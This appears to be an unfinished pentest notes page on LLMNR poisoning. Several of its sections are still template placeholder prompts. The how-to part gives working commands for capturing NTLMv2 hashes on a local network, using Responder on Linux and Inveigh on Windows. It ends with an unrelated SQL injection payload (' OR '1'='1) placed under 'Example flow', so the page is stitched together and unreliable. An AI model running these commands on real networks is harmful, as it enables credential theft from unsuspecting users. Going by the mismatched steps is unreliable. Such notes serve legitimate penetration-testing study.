Skip to main content

💥 LLMNR Poisioning


🧠 What’s the Deal?​

Give us the lowdown — what is this attack and why should anyone care?

Explain the core idea behind the attack, where it fits in the kill chain, and what makes it dangerous or interesting.


🎯 What’s the Big Win?​

What’s the attacker trying to pull off here?

  • Gain unauthorized access
  • Extract sensitive data
  • Escalate privileges
  • Lateral movement across the network

Launch Sequence (How-To)​

LLMNR poisioning using Linux machine​

# Once you are in the same network as the victim machines
sudo responder -I <Interface name>

LLMNR Poisioning using Windows machine​

# Once you are in the same network as the victim machines
Import-Module .\Inveigh.ps1

#OR

.\Inveigh.exe

# Press esc and type command
GET NTLMV2UNIQUE # to get ntlm captured

Example flow:

  1. Identify the injection point
  2. Craft payload: ' OR '1'='1
  3. Send request and observe results